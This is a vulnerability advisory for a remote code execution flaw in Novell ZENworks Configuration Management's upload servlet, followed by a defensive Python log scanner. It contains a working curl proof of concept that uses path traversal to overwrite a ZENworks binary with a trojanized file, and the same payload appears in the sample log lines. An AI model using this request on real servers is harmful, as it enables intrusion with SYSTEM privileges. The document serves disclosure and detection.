Novell ZENworks Configuration Management 'UploadServlet' Remote Code Execution Vulnerability
BID:39114
Info
| Bugtraq ID: | 39114 |
| Class: | Unknown |
| CVE: | CVE-2010-5324 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 30 2010 12:00AM |
| Updated: | Jul 15 2015 12:24AM |
| Credit: | Stephen Fewer of Harmony Security via TippingPoint's Zero Day Initiative |
| Vulnerable: | Novell ZENworks Configuration Management 10.1.2 a; Novell ZENworks Configuration Management 10.1.2; Novell ZENworks Configuration Management 10.1 |
| Not Vulnerable: | Novell ZENworks Configuration Management 10.3 |
Discussion
Novell ZENworks Configuration Management is prone to a remote code-execution vulnerability.
An attacker can leverage this issue to execute arbitrary code with SYSTEM-level privileges. Failed exploit attempts will result in a denial-of-service condition.
Versions prior to ZENworks Configuration Management 10.3 are vulnerable.
Exploit / POC
An attacker can exploit the issue via a browser.
The following proof-of-concept and exploit code are available:
$ curl -ivkl 'http://www.example.com/zenworks-fileupload/?type=application/octet-stream/../../../../../../../opt/novell/zenworks/bin/&filename=daemon-monitor&overwrite=true' --data-binary @./daemon-monitor.troyanizado -H "Content-Type: application/octet-stream"
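For defenders reviewing web server logs, the request above has a recognizable shape: a path-bearing query parameter on the upload servlet that contains ".." segments. The following is an added example, not code from the original advisory or from Novell; the log lines are constructed, the combined log format is an assumption, and the choice of "type" and "filename" as the parameters to check is taken from the request shown above.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

UPLOAD_PATH = "/zenworks-fileupload/"    # servlet path from the request above
CHECKED_PARAMS = ("type", "filename")    # parameters carrying path data in that request
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines (combined log format), not captured traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Mar/2010:10:00:00 +0000] "POST /zenworks-fileupload/?type=application/octet-stream/../../../../../../../opt/novell/zenworks/bin/&filename=daemon-monitor&overwrite=true HTTP/1.1" 200 0',
    '192.0.2.11 - - [30/Mar/2010:10:00:05 +0000] "POST /zenworks-fileupload/?type=application/octet-stream&filename=report.bin HTTP/1.1" 200 0',
    '192.0.2.12 - - [30/Mar/2010:10:00:09 +0000] "POST /zenworks-fileupload/?type=x%252f%252e%252e%252fbin&filename=a HTTP/1.1" 200 0',
    '192.0.2.13 - - [30/Mar/2010:10:00:12 +0000] "GET /zenworks/ HTTP/1.1" 200 512',
]

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252e) is unwrapped."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def has_traversal(value):
    """True if any path segment, split on either slash style, is exactly '..'."""
    return ".." in re.split(r"[\\/]", fully_decode(value))

def flagged_params(log_line):
    """Return the sorted names of upload-servlet parameters that contain traversal."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group("target"))
    if not url.path.lower().startswith(UPLOAD_PATH):
        return []
    params = parse_qs(url.query, keep_blank_values=True)  # decodes one layer
    return sorted(name for name in CHECKED_PARAMS
                  if any(has_traversal(v) for v in params.get(name, [])))

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        hits = flagged_params(line)
        if hits:
            print("ALERT traversal in", hits, "->", line)
```

The same segment check, applied to the resolved destination path before any write, is the server-side form of this rule.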
Solution / Fix
Solution:
Updates are available; please see the references for more information.
References
References:
- PdC de ZDI-10-078 (tucanalamigo)
- Security Vulnerability with ZCM Remote Execution (Novell)
- ZDI-10-078: Novell ZENworks Configuration Management UploadServlet Remote Code E (Zero Day Initiative)
- ZENworks Configuration Management Homepage (Novell)